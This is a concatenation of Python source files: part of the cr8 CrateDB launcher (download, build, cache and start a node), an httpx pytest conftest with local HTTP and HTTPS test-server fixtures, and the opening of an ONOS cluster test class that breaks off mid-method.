self.cluster_name = settings.get('cluster.name') or 'cr8'
self.keep_data = keep_data
settings['path.data'] = self.data_path
settings['cluster.name'] = self.cluster_name
if self.version < (1, 0, 0):
_format_option = _format_cmd_option_legacy
else:
_format_option = _format_cmd_option
args = [_format_option(k, v) for k, v in settings.items()]
self.cmd = [
os.path.join(crate_dir, 'bin', start_script)] + args
def start(self):
"""Start the process.
This will block until the Crate cluster is ready to process requests.
"""
log.info('Starting Crate process')
self.process = proc = self.enter_context(subprocess.Popen(
self.cmd,
stdin=subprocess.DEVNULL,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=self.env,
universal_newlines=True
))
msg = ('CrateDB launching:\n'
' PID: %s\n'
' Logs: %s\n'
' Data: %s')
if not self.keep_data:
msg += ' (removed on stop)\n'
logfile = os.path.join(self.logs_path, self.cluster_name + '.log')
log.info(
msg,
proc.pid,
logfile,
self.data_path
)
self.addresses = DotDict({})
self.monitor.consumers.append(AddrConsumer(self._set_addr))
self.monitor.start(proc)
log_lines = []
self.monitor.consumers.append(log_lines.append)
spinner = cycle(['/', '-', '\\', '|'])
def show_spinner():
if sys.stdout.isatty():
print(next(spinner), end='\r')
return True
try:
wait_until(
lambda: show_spinner() and _ensure_running(proc) and self.http_host,
timeout=60
)
host = self.addresses.http.host
port = self.addresses.http.port
wait_until(
lambda: _ensure_running(proc) and _is_up(host, port),
timeout=30
)
if _has_ssl(host, port):
self.http_url = self.http_url.replace('http://', 'https://')
wait_until(
lambda: show_spinner() and cluster_state_200(self.http_url),
timeout=30
)
except (SystemExit, TimeoutError):
if not log_lines:
_try_print_log(logfile)
else:
for line in (x.rstrip() for x in log_lines if x):
log.error(line)
raise SystemExit("CrateDB didn't start in time or couldn't form a cluster.") from None
else:
self.monitor.consumers.remove(log_lines.append)
log.info('Cluster ready to process requests')
def _set_addr(self, protocol, addr):
log.info('{0:10}: {1}'.format(protocol.capitalize(), addr))
host, port = addr.rsplit(':', 1)
port = int(port)
self.addresses[protocol] = Address(host, port)
if protocol == 'http':
self.http_host = addr
self.http_url = 'http://' + addr
def stop(self):
if self.process:
self.process.terminate()
self.process.communicate(timeout=10)
self.addresses = DotDict({})
self.http_host = None
self.http_url = None
if not self.keep_data:
path = self.data_path.split(',')
for p in path:
shutil.rmtree(p)
def __enter__(self):
return self
def __exit__(self, *ex):
self.stop()
class Address(NamedTuple):
host: str
port: int
class AddrConsumer:
ADDRESS_RE = re.compile(
r'.*\[(?P<protocol>http|i.c.p.h.CrateNettyHttpServerTransport|o.e.h.n.Netty4HttpServerTransport|o.e.h.HttpServer|psql|transport|o.e.t.TransportService)\s*\] \[.*\] .*'
r'publish_address {'
r'(?:(inet\[[A-Za-z-\.]*/)|([A-Za-z\.]*/))?'
r'?(?P<addr>\[?[\d\.:]+\]?:?\d+)'
r'(?:\])?'
r'}'
)
PROTOCOL_MAP = {
'i.c.p.h.CrateNettyHttpServerTransport': 'http',
'o.e.h.n.Netty4HttpServerTransport': 'http',
'o.e.h.HttpServer': 'http',
'o.e.t.TransportService': 'transport'
}
def __init__(self, on_addr):
self.on_addr = on_addr
@staticmethod
def _parse(line):
""" Parse protocol and bound address from log message
>>> AddrConsumer._parse('NONE')
(None, None)
>>> AddrConsumer._parse('[INFO ][i.c.p.h.CrateNettyHttpServerTransport] [Widderstein] publish_address {127.0.0.1:4200}, bound_addresses {[fe80::1]:4200}, {[::1]:4200}, {127.0.0.1:4200}')
('http', '127.0.0.1:4200')
>>> AddrConsumer._parse('[INFO ][o.e.h.n.Netty4HttpServerTransport] [Piz Forun] publish_address {127.0.0.1:4200}, bound_addresses {[::1]:4200}, {127.0.0.1:4200}')
('http', '127.0.0.1:4200')
>>> AddrConsumer._parse('[INFO ][o.e.t.TransportService ] [Widderstein] publish_address {127.0.0.1:4300}, bound_addresses {[fe80::1]:4300}, {[::1]:4300}, {127.0.0.1:4300}')
('transport', '127.0.0.1:4300')
>>> AddrConsumer._parse('[INFO ][psql ] [Widderstein] publish_address {127.0.0.1:5432}, bound_addresses {127.0.0.1:5432}')
('psql', '127.0.0.1:5432')
"""
m = AddrConsumer.ADDRESS_RE.match(line)
if not m:
return None, None
protocol = m.group('protocol')
protocol = AddrConsumer.PROTOCOL_MAP.get(protocol, protocol)
return protocol, m.group('addr')
def send(self, line):
protocol, addr = AddrConsumer._parse(line)
if protocol:
self.on_addr(protocol, addr)
def _openuri(uri):
if os.path.isfile(uri):
return open(uri, 'rb')
return io.BytesIO(urlopen(uri).read())
def _can_use_cache(uri, crate_dir):
if not os.path.exists(crate_dir):
return False
os.utime(crate_dir) # update mtime to avoid removal
if os.path.isfile(uri):
with _openuri(uri) as f:
checksum = sha1(f.read()).hexdigest()
return os.path.exists(os.path.join(crate_dir, checksum))
# Always enable use of the cache if the source is not local
return True
def _download_and_extract(uri, crate_root):
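# The extracted folder doubles as a cache: a marker file named after the
# tarball's sha1 checksum records which archive was unpacked there (this is
# what _can_use_cache checks above).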
filename = os.path.basename(uri)
crate_folder_name = re.sub(r'\.tar(\.gz)?$', '', filename)
crate_dir = os.path.join(crate_root, crate_folder_name)
if _can_use_cache(uri, crate_dir):
log.info('Skipping download, tarball already extracted at %s', crate_dir)
return crate_dir
elif os.path.exists(crate_dir):
shutil.rmtree(crate_dir, ignore_errors=True)
log.info('Downloading %s and extracting to %s', uri, crate_root)
with _openuri(uri) as tmpfile:
with tarfile.open(fileobj=tmpfile) as t:
t.extractall(crate_root)
tmpfile.seek(0)
checksum = sha1(tmpfile.read()).hexdigest()
with open(os.path.join(crate_dir, checksum), 'a'):
os.utime(os.path.join(crate_dir, checksum))
return crate_dir
def _from_versions_json(key):
def retrieve():
with urlopen('https://crate.io/releases.json') as r:
if r.headers.get('Content-Encoding') == 'gzip':
with gzip.open(r, 'rt') as r:
versions = json.loads(r.read())
else:
versions = json.loads(r.read().decode('utf-8'))
segments = ReleaseUrlSegments.create()
downloads = versions[key]['downloads']
if segments.platform_key in downloads:
return downloads[segments.platform_key]['url']
else:
return downloads['tar.gz']['url']
return retrieve
RELEASE_RE = re.compile(r'.*>(?P<filename>crate-(?P<version>\d+\.\d+\.\d+)\.tar\.gz)<.*')
def _retrieve_crate_versions():
base_uri = 'https://cdn.crate.io/downloads/releases/'
with urlopen(base_uri) as r:
lines = (line.decode('utf-8') for line in r)
for line in lines:
m = RELEASE_RE.match(line)
if m:
yield m.group('version')
def _find_matching_version(versions, version_pattern):
"""
Return the first matching version
>>> _find_matching_version(['1.1.4', '1.0.12', '1.0.5'], '1.0.x')
'1.0.12'
>>> _find_matching_version(['1.1.4', '1.0.6', '1.0.5'], '2.x.x')
"""
pattern = fnmatch.translate(version_pattern.replace('x', '*'))
return next((v for v in versions if re.match(pattern, v)), None)
_version_lookups = {
'latest': _from_versions_json('stable'),
'latest-stable': _from_versions_json('stable'),
'latest-testing': _from_versions_json('testing'),
'latest-nightly': _from_versions_json('nightly')
}
def _get_uri_from_released_version(version: str) -> str:
version_tup = parse_version(version)
if version_tup < (4, 2, 0):
return RELEASE_URL.format(version=version)
try:
return ReleaseUrlSegments.create().get_uri(version)
except ValueError:
# Unsupported platform, just return the linux tarball
return RELEASE_URL.format(version=version)
def _lookup_uri(version):
if version in _version_lookups:
version = _version_lookups[version]()
m = VERSION_RE.match(version)
if m:
return _get_uri_from_released_version(m.group(0))
m = DYNAMIC_VERSION_RE.match(version)
if m:
versions = sorted(map(parse_version, list(_retrieve_crate_versions())))
versions = ['.'.join(map(str, v)) for v in versions[::-1]]
release = _find_matching_version(versions, m.group(0))
if release:
return _get_uri_from_released_version(release)
return version
def _is_project_repo(src_repo):
return (os.path.isdir(src_repo) and
os.path.exists(os.path.join(src_repo, '.git')) and
os.path.exists(os.path.join(src_repo, 'gradlew')))
def _build_tarball(src_repo) -> Path:
""" Build a tarball from src and return the path to it """
run = partial(subprocess.run, cwd=src_repo, check=True)
run(['git', 'clean', '-xdff'])
src_repo = Path(src_repo)
if os.path.exists(src_repo / 'es' / 'upstream'):
run(['git', 'submodule', 'update', '--init', '--', 'es/upstream'])
run(['./gradlew', '--parallel', '--no-daemon', 'clean', 'distTar'])
distributions = Path(src_repo) / 'app' / 'build' / 'distributions'
return next(distributions.glob('crate-*.tar.gz'))
def _extract_tarball(tarball):
with tarfile.open(tarball) as t:
folder_name = t.getnames()[0]
t.extractall(tarball.parent)
return str(tarball.parent / folder_name)
def _build_from_release_branch(branch, crate_root):
crates = Path(crate_root)
src_repo = crates / 'sources_tmp'
run_in_repo = partial(subprocess.run, cwd=src_repo, check=True)
if not src_repo.exists() or not (src_repo / '.git').exists():
clone = ['git', 'clone', REPO_URL, 'sources_tmp']
subprocess.run(clone, cwd=crate_root, check=True)
else:
run_in_repo(['git', 'fetch'])
run_in_repo(['git', 'checkout', branch])
run_in_repo(['git', 'pull', 'origin', branch])
rev_parse_p = run_in_repo(
['git', 'rev-parse', 'HEAD'], stdout=subprocess.PIPE, encoding='utf-8')
revision = rev_parse_p.stdout.strip()
builds_dir = crates / 'builds'
os.makedirs(builds_dir, exist_ok=True)
cached_build = builds_dir / (revision + '.tar.gz')
if os.path.isfile(cached_build):
return _extract_tarball(cached_build)
tarball = _build_tarball(str(src_repo))
shutil.copy(tarball, cached_build)
return _extract_tarball(tarball)
def _remove_old_crates(path):
now = time.time()
s7days_ago = now - (7 * 24 * 60 * 60)
with contextlib.suppress(FileNotFoundError):
old_unused_dirs = (e for e in os.scandir(path)
if e.is_dir() and e.stat().st_mtime < s7days_ago)
for e in old_unused_dirs:
last_use = datetime.fromtimestamp(e.stat().st_mtime)
msg = f'Removing from cache: {e.name} (last use: {last_use:%Y-%m-%d %H:%M})'
print(msg, file=sys.stderr)
shutil.rmtree(e.path)
def _crates_cache() -> str:
""" Return the path to the crates cache folder """
return os.environ.get(
'XDG_CACHE_HOME',
os.path.join(os.path.expanduser('~'), '.cache', 'cr8', 'crates'))
def get_crate(version, crate_root=None):
"""Retrieve a Crate tarball, extract it and return the path.
Args:
version: The Crate version to get.
Can be specified in different ways:
- A concrete version like '0.55.0'
- A version including a `x` as wildcards. Like: '1.1.x' or '1.x.x'.
This will use the latest version that matches.
- Release branch, like `3.1`
- Any branch: 'branch:<branchName>'
- An alias: 'latest-stable' or 'latest-testing'
- A URI pointing to a crate tarball
crate_root: Where to extract the tarball to.
If this isn't specified ``$XDG_CACHE_HOME/.cache/cr8/crates``
will be used.
"""
if not crate_root:
crate_root = _crates_cache()
os.makedirs(crate_root, exist_ok=True)
_remove_old_crates(crate_root)
if _is_project_repo(version):
return _extract_tarball(_build_tarball(version))
m = BRANCH_VERSION_RE.match(version)
if m:
return _build_from_release_branch(m.group(0), crate_root)
if version.startswith('branch:'):
return _build_from_release_branch(version[len('branch:'):], crate_root)
uri = _lookup_uri(version)
crate_dir = _download_and_extract(uri, crate_root)
return crate_dir
def _parse_options(options: List[str]) -> Dict[str, str]:
""" Parse repeatable CLI options
>>> opts = _parse_options(['cluster.name=foo', 'CRATE_JAVA_OPTS="-Dxy=foo"'])
>>> print(json.dumps(opts, sort_keys=True))
{"CRATE_JAVA_OPTS": "\\"-Dxy=foo\\"", "cluster.name": "foo"}
"""
try:
return dict(i.split('=', maxsplit=1) for i in options) # type: ignore
except ValueError:
raise ArgumentError(
f'Option must be in format <key>=<value>, got: {options}')
def create_node(
version,
env=None,
setting=None,
crate_root=None,
keep_data=False,
java_magic=False,
):
init_logging(log)
settings = {
'cluster.name': 'cr8-crate-run' + str(random.randrange(1e9))
}
crate_dir = get_crate(version, crate_root)
if setting:
settings.update(_parse_options(setting))
if env:
env = _parse_options(env)
return CrateNode(
crate_dir=crate_dir,
env=env,
settings=settings,
keep_data=keep_data,
java_magic=java_magic
)
@argh.arg('version', help='Crate version to run')
@argh.arg('-e', '--env', action='append',
help='Environment variable. Option can be specified multiple times.')
@argh.arg('-s', '--setting', action='append',
help='Crate setting. Option can be specified multiple times.')
@argh.arg('--keep-data', help='If this is set the data folder will be kept.')
@argh.arg(
'--disable-java-magic',
help='Disable the logic to detect a suitable JAVA_HOME')
@argh.wrap_errors([ArgumentError])
def run_crate(
version,
env=None,
setting=None,
crate_root=None,
keep_data=False,
disable_java_magic=False,
):
"""Launch a crate instance.
Supported version specifications:
- Concrete version like "0.55.0" or with wildcard: "1.1.x"
- An alias (one of [latest-nightly, latest-stable, latest-testing])
- A URI pointing to a CrateDB tarball (in .tar.gz format)
- A URI pointing to a checked out CrateDB repo directory
- A branch like `branch:master` or `branch:my-new-feature`
run-crate supports command chaining. To launch a CrateDB node and another
sub-command use:
cr8 run-crate <ver> -- timeit -s "select 1" --hosts '{node.http_url}'
To launch any (blocking) subprocess, prefix the name with '@':
cr8 run-crate <version> -- @http '{node.http_url}'
If run-crate is invoked using command chaining it will exit once all
chained commands finished.
The postgres host and port are available as {node.addresses.psql.host} and
{node.addresses.psql.port}
"""
with create_node(
version,
env,
setting,
crate_root,
keep_data,
java_magic=not disable_java_magic,
) as n:
try:
n.start()
n.process.wait()
except KeyboardInterrupt:
print('Stopping Crate...')
if __name__ == "__main__":
argh.dispatch_command(run_crate)
|
conftest.py
|
import asyncio
import json
import os
import threading
import time
import typing
import pytest
import trustme
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.serialization import (
BestAvailableEncryption,
Encoding,
PrivateFormat,
load_pem_private_key,
)
from uvicorn.config import Config
from uvicorn.main import Server
from httpx import URL
from tests.concurrency import sleep
ENVIRONMENT_VARIABLES = {
"SSL_CERT_FILE",
"SSL_CERT_DIR",
"HTTP_PROXY",
"HTTPS_PROXY",
"ALL_PROXY",
"NO_PROXY",
"SSLKEYLOGFILE",
}
@pytest.fixture(
params=[
pytest.param("asyncio", marks=pytest.mark.asyncio),
pytest.param("trio", marks=pytest.mark.trio),
]
)
def async_environment(request: typing.Any) -> str:
"""
Mark a test function to be run on both asyncio and trio.
Equivalent to having a pair of tests, each respectively marked with
'@pytest.mark.asyncio' and '@pytest.mark.trio'.
Intended usage:
```
@pytest.mark.usefixtures("async_environment")
async def my_async_test():
...
```
"""
return request.param
@pytest.fixture(scope="function", autouse=True)
def clean_environ():
"""Keeps os.environ clean for every test without having to mock os.environ"""
original_environ = os.environ.copy()
os.environ.clear()
os.environ.update(
{
k: v
for k, v in original_environ.items()
if k not in ENVIRONMENT_VARIABLES and k.lower() not in ENVIRONMENT_VARIABLES
}
)
yield
os.environ.clear()
os.environ.update(original_environ)
async def app(scope, receive, send):
assert scope["type"] == "http"
if scope["path"].startswith("/slow_response"):
await slow_response(scope, receive, send)
elif scope["path"].startswith("/slow_stream_response"):
await slow_stream_response(scope, receive, send)
elif scope["path"].startswith("/status"):
await status_code(scope, receive, send)
elif scope["path"].startswith("/echo_body"):
await echo_body(scope, receive, send)
elif scope["path"].startswith("/echo_headers"):
await echo_headers(scope, receive, send)
elif scope["path"].startswith("/redirect_301"):
await redirect_301(scope, receive, send)
else:
await hello_world(scope, receive, send)
async def hello_world(scope, receive, send):
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": b"Hello, world!"})
async def slow_response(scope, receive, send):
await sleep(1.0)
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": b"Hello, world!"})
async def slow_stream_response(scope, receive, send):
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"text/plain"]],
}
)
await sleep(1)
await send({"type": "http.response.body", "body": b"", "more_body": False})
async def status_code(scope, receive, send):
status_code = int(scope["path"].replace("/status/", ""))
await send(
{
"type": "http.response.start",
"status": status_code,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": b"Hello, world!"})
async def echo_body(scope, receive, send):
body = b""
more_body = True
while more_body:
message = await receive()
body += message.get("body", b"")
more_body = message.get("more_body", False)
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": body})
async def echo_headers(scope, receive, send):
body = {}
for name, value in scope.get("headers", []):
body[name.capitalize().decode()] = value.decode()
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"application/json"]],
}
)
await send({"type": "http.response.body", "body": json.dumps(body).encode()})
async def redirect_301(scope, receive, send):
await send(
{"type": "http.response.start", "status": 301, "headers": [[b"location", b"/"]]}
)
await send({"type": "http.response.body"})
SERVER_SCOPE = "session"
@pytest.fixture(scope=SERVER_SCOPE)
def cert_authority():
return trustme.CA()
@pytest.fixture(scope=SERVER_SCOPE)
def ca_cert_pem_file(cert_authority):
with cert_authority.cert_pem.tempfile() as tmp:
yield tmp
@pytest.fixture(scope=SERVER_SCOPE)
def localhost_cert(cert_authority):
return cert_authority.issue_cert("localhost")
@pytest.fixture(scope=SERVER_SCOPE)
def cert_pem_file(localhost_cert):
with localhost_cert.cert_chain_pems[0].tempfile() as tmp:
yield tmp
@pytest.fixture(scope=SERVER_SCOPE)
def cert_private_key_file(localhost_cert):
with localhost_cert.private_key_pem.tempfile() as tmp:
yield tmp
@pytest.fixture(scope=SERVER_SCOPE)
def cert_encrypted_private_key_file(localhost_cert):
# Deserialize the private key and then reserialize with a password
private_key = load_pem_private_key(
localhost_cert.private_key_pem.bytes(), password=None, backend=default_backend()
)
encrypted_private_key_pem = trustme.Blob(
private_key.private_bytes(
Encoding.PEM,
PrivateFormat.TraditionalOpenSSL,
BestAvailableEncryption(password=b"password"),
)
)
with encrypted_private_key_pem.tempfile() as tmp:
yield tmp
class TestServer(Server):
@property
def url(self) -> URL:
protocol = "https" if self.config.is_ssl else "http"
return URL(f"{protocol}://{self.config.host}:{self.config.port}/")
def install_signal_handlers(self) -> None:
# Disable the default installation of handlers for signals such as SIGTERM,
# because it can only be done in the main thread.
pass
async def serve(self, sockets=None):
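# Run the regular uvicorn serve loop alongside a watcher task that performs a
# shutdown/startup cycle whenever restart() is requested from a test.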
self.restart_requested = asyncio.Event()
loop = asyncio.get_event_loop()
tasks = {
loop.create_task(super().serve(sockets=sockets)),
loop.create_task(self.watch_restarts()),
}
await asyncio.wait(tasks)
async def restart(self) -> None: # pragma: nocover
# This coroutine may be called from a different thread than the one the
# server is running on, and from an async environment that's not asyncio.
# For this reason, we use an event to coordinate with the server
# instead of calling shutdown()/startup() directly, and should not make
# any asyncio-specific operations.
self.started = False
self.restart_requested.set()
while not self.started:
await sleep(0.2)
async def watch_restarts(self): # pragma: nocover
while True:
if self.should_exit:
return
try:
await asyncio.wait_for(self.restart_requested.wait(), timeout=0.1)
except asyncio.TimeoutError:
continue
self.restart_requested.clear()
await self.shutdown()
await self.startup()
def serve_in_thread(server: Server):
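# Run the server in a background thread, yield it to the test once it has
# started, then request exit and join the thread on teardown.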
thread = threading.Thread(target=server.run)
thread.start()
try:
while not server.started:
time.sleep(1e-3)
yield server
finally:
server.should_exit = True
thread.join()
@pytest.fixture(scope=SERVER_SCOPE)
def server():
config = Config(app=app, lifespan="off", loop="asyncio")
server = TestServer(config=config)
yield from serve_in_thread(server)
@pytest.fixture(scope=SERVER_SCOPE)
def https_server(cert_pem_file, cert_private_key_file):
config = Config(
app=app,
lifespan="off",
ssl_certfile=cert_pem_file,
ssl_keyfile=cert_private_key_file,
port=8001,
loop="asyncio",
)
server = TestServer(config=config)
yield from serve_in_thread(server)
|
clusterTest.py
|
# Copyright 2017-present Open Networking Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright 2016-present Ciena Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import unittest
from nose.tools import *
from scapy.all import *
from OnosCtrl import OnosCtrl
from OltConfig import OltConfig
from CordTestUtils import get_mac, get_controller, get_controllers, log_test
from OnosFlowCtrl import OnosFlowCtrl
from nose.twistedtools import reactor, deferred
from twisted.internet import defer
from onosclidriver import OnosCliDriver
from CordContainer import Container, Onos, Quagga
from CordTestServer import cord_test_onos_restart, cord_test_onos_shutdown, cord_test_onos_add_cluster, cord_test_quagga_restart, cord_test_restart_cluster
from portmaps import g_subscriber_port_map
from scapy.all import *
import time, monotonic
import threading
from threading import current_thread
from Cluster import *
from EapTLS import TLSAuthTest
from ACL import ACLTest
from OnosLog import OnosLog
from CordLogger import CordLogger
from CordTestConfig import setup_module, teardown_module
import os
import json
import random
import collections
log_test.setLevel('INFO')
class cluster_exchange(CordLogger):
test_path = os.path.dirname(os.path.realpath(__file__))
onos_config_path = os.path.join(test_path, '..', 'setup/onos-config')
mac = RandMAC()._fix()
flows_eth = Ether(src = RandMAC()._fix(), dst = RandMAC()._fix())
igmp_eth = Ether(dst = '01:00:5e:00:00:16', type = ETH_P_IP)
igmp_ip = IP(dst = '224.0.0.22')
ONOS_INSTANCES = 3
V_INF1 = 'veth0'
TLS_TIMEOUT = 100
device_id = 'of:' + get_mac()
igmp = cluster_igmp()
igmp_groups = igmp.mcast_ip_range(start_ip = '224.1.8.10',end_ip = '224.1.10.49')
igmp_sources = igmp.source_ip_range(start_ip = '38.24.29.35',end_ip='38.24.35.56')
tls = cluster_tls()
flows = cluster_flows()
proxyarp = cluster_proxyarp()
vrouter = cluster_vrouter()
acl = cluster_acl()
dhcprelay = cluster_dhcprelay()
subscriber = cluster_subscriber()
testcaseLoggers = ('test_cluster_controller_restarts', 'test_cluster_graceful_controller_restarts',
'test_cluster_single_controller_restarts', 'test_cluster_restarts')
ITERATIONS = int(os.getenv('ITERATIONS', 10))
ARCHIVE_PARTITION = False
def setUp(self):
if self._testMethodName not in self.testcaseLoggers:
super(cluster_exchange, self).setUp()
def tearDown(self):
if self._testMethodName not in self.testcaseLoggers:
super(cluster_exchange, self).tearDown()
def cliEnter(self, controller = None):
retries = 0
while retries < 30:
self.cli = OnosCliDriver(controller = controller, connect = True)
if self.cli.handle:
break
else:
retries += 1
time.sleep(2)
def cliExit(self):
self.cli.disconnect()
def get_leader(self, controller = None):
self.cliEnter(controller = controller)
try:
result = json.loads(self.cli.leaders(jsonFormat = True))
except:
result = None
if result is None:
log_test.info('Leaders command failure for controller %s' %controller)
else:
log_test.info('Leaders returned: %s' %result)
self.cliExit()
return result
def onos_shutdown(self, controller = None):
status = True
self.cliEnter(controller = controller)
try:
self.cli.shutdown(timeout = 10)
except:
log_test.info('Graceful shutdown of ONOS failed for controller: %s' %controller)
status = False
self.cliExit()
return status
def log_set(self, level = None, app = 'org.onosproject', controllers = None):
CordLogger.logSet(level = level, app = app, controllers = controllers, forced = True)
def get_leaders(self, controller = None):
result_map = {}
if controller is None:
controller = get_controller()
if type(controller) in [ list, tuple ]:
for c in controller:
leaders = self.get_leader(controller = c)
result_map[c] = leaders
else:
leaders = self.get_leader(controller = controller)
result_map[controller] = leaders
return result_map
def verify_leaders(self, controller = None):
leaders_map = self.get_leaders(controller = controller)
failed = [ k for k,v in leaders_map.items() if v == None ]
return failed
def verify_cluster_status(self,controller = None,onos_instances=ONOS_INSTANCES,verify=False):
tries = 0
try:
self.cliEnter(controller = controller)
while tries <= 10:
cluster_summary = json.loads(self.cli.summary(jsonFormat = True))
if cluster_summary:
log_test.info("cluster 'summary' command output is %s"%cluster_summary)
nodes = cluster_summary['nodes']
if verify:
if nodes == onos_instances:
self.cliExit()
return True
else:
tries += 1
time.sleep(1)
else:
if nodes >= onos_instances:
self.cliExit()
return True
else:
tries += 1
time.sleep(1)
else:
tries += 1
time.sleep(1)
self.cliExit()
return False
except:
raise Exception('Failed to get cluster members')
return False
def get_cluster_current_member_ips(self, controller = None, nodes_filter = None):
tries = 0
cluster_ips = []
try:
self.cliEnter(controller = controller)
while tries <= 10:
cluster_nodes = json.loads(self.cli.nodes(jsonFormat = True))
if cluster_nodes:
log_test.info("cluster 'nodes' output is %s"%cluster_nodes)
if nodes_filter:
cluster_nodes = nodes_filter(cluster_nodes)
cluster_ips = map(lambda c: c['id'], cluster_nodes)
self.cliExit()
cluster_ips.sort(lambda i1,i2: int(i1.split('.')[-1]) - int(i2.split('.')[-1]))
return cluster_ips
else:
tries += 1
self.cliExit()
return cluster_ips
except:
raise Exception('Failed to get cluster members')
return cluster_ips
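    #build a two way map between controller ips and their ONOS container names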
def get_cluster_container_names_ips(self,controller=None):
onos_names_ips = {}
controllers = get_controllers()
i = 0
for controller in controllers:
if i == 0:
name = Onos.NAME
else:
name = '{}-{}'.format(Onos.NAME, i+1)
onos_names_ips[controller] = name
onos_names_ips[name] = controller
i += 1
return onos_names_ips
# onos_ips = self.get_cluster_current_member_ips(controller=controller)
# onos_names_ips[onos_ips[0]] = Onos.NAME
# onos_names_ips[Onos.NAME] = onos_ips[0]
# for i in range(1,len(onos_ips)):
# name = '{0}-{1}'.format(Onos.NAME,i+1)
# onos_names_ips[onos_ips[i]] = name
# onos_names_ips[name] = onos_ips[i]
# return onos_names_ips
    #identify the current master and standbys of a connected device; not yet tested
def get_cluster_current_master_standbys(self,controller=None,device_id=device_id):
master = None
standbys = []
tries = 0
try:
cli = self.cliEnter(controller = controller)
while tries <= 10:
roles = json.loads(self.cli.roles(jsonFormat = True))
log_test.info("cluster 'roles' command output is %s"%roles)
if roles:
for device in roles:
log_test.info('Verifying device info in line %s'%device)
if device['id'] == device_id:
master = str(device['master'])
standbys = map(lambda d: str(d), device['standbys'])
log_test.info('Master and standbys for device %s are %s and %s'%(device_id, master, standbys))
self.cliExit()
return master, standbys
self.cliExit()
return master, standbys
else:
tries += 1
time.sleep(1)
self.cliExit()
return master,standbys
except:
raise Exception('Failed to get cluster members')
return master,standbys
def get_cluster_current_master_standbys_of_connected_devices(self,controller=None):
''' returns master and standbys of all the connected devices to ONOS cluster instance'''
device_dict = {}
tries = 0
try:
cli = self.cliEnter(controller = controller)
while tries <= 10:
device_dict = {}
roles = json.loads(self.cli.roles(jsonFormat = True))
log_test.info("cluster 'roles' command output is %s"%roles)
if roles:
for device in roles:
device_dict[str(device['id'])]= {'master':str(device['master']),'standbys':device['standbys']}
for i in range(len(device_dict[device['id']]['standbys'])):
device_dict[device['id']]['standbys'][i] = str(device_dict[device['id']]['standbys'][i])
log_test.info('master and standbys for device %s are %s and %s'%(device['id'],device_dict[device['id']]['master'],device_dict[device['id']]['standbys']))
self.cliExit()
return device_dict
else:
tries += 1
time.sleep(1)
self.cliExit()
return device_dict
except:
raise Exception('Failed to get cluster members')
return device_dict
    #list all the devices connected to the ONOS cluster; not yet tested
def get_cluster_connected_devices(self,controller=None):
'''returns all the devices connected to ONOS cluster'''
device_list = []
tries = 0
try:
cli = self.cliEnter(controller = controller)
while tries <= 10:
device_list = []
devices = json.loads(self.cli.devices(jsonFormat = True))
log_test.info("cluster 'devices' command output is %s"%devices)
if devices:
for device in devices:
log_test.info('device id is %s'%device['id'])
device_list.append(str(device['id']))
self.cliExit()
return device_list
else:
tries += 1
time.sleep(1)
self.cliExit()
return device_list
except:
raise Exception('Failed to get cluster members')
return device_list
def get_number_of_devices_of_master(self,controller=None):
        '''returns master-device pairs, i.e. which devices each master controls'''
master_count = {}
try:
cli = self.cliEnter(controller = controller)
masters = json.loads(self.cli.masters(jsonFormat = True))
if masters:
for master in masters:
master_count[str(master['id'])] = {'size':int(master['size']),'devices':master['devices']}
return master_count
else:
return master_count
except:
raise Exception('Failed to get cluster members')
return master_count
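    #change the mastership of a device with 'device-role <device> <controller> master' and verify the new master took over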
def change_master_current_cluster(self,new_master=None,device_id=device_id,controller=None):
if new_master is None: return False
self.cliEnter(controller=controller)
cmd = 'device-role' + ' ' + device_id + ' ' + new_master + ' ' + 'master'
command = self.cli.command(cmd = cmd, jsonFormat = False)
self.cliExit()
time.sleep(60)
master, standbys = self.get_cluster_current_master_standbys(controller=controller,device_id=device_id)
assert_equal(master,new_master)
log_test.info('Cluster master changed to %s successfully'%new_master)
def withdraw_cluster_current_mastership(self,master_ip=None,device_id=device_id,controller=None):
        '''current master loses its mastership so that a new master gets elected'''
self.cliEnter(controller=controller)
cmd = 'device-role' + ' ' + device_id + ' ' + master_ip + ' ' + 'none'
command = self.cli.command(cmd = cmd, jsonFormat = False)
self.cliExit()
time.sleep(60)
new_master_ip, standbys = self.get_cluster_current_master_standbys(controller=controller,device_id=device_id)
assert_not_equal(new_master_ip,master_ip)
log_test.info('Device-role of device %s successfully changed to none for controller %s'%(device_id,master_ip))
log_test.info('Cluster new master is %s'%new_master_ip)
return True
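    #helper for the controller restart tests: restart one controller per iteration, archive the logs and check the remaining nodes for storage exceptions and leader failures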
def cluster_controller_restarts(self, graceful = False):
controllers = get_controllers()
ctlr_len = len(controllers)
if ctlr_len <= 1:
log_test.info('ONOS is not running in cluster mode. This test only works for cluster mode')
assert_greater(ctlr_len, 1)
        #map controller ips to container names before starting the restart iterations
onos_map = self.get_cluster_container_names_ips()
def check_exception(iteration, controller = None):
adjacent_controller = None
adjacent_controllers = None
if controller:
adjacent_controllers = list(set(controllers) - set([controller]))
adjacent_controller = adjacent_controllers[0]
for node in controllers:
onosLog = OnosLog(host = node)
##check the logs for storage exception
_, output = onosLog.get_log(('ERROR', 'Exception',))
if output and output.find('StorageException$Timeout') >= 0:
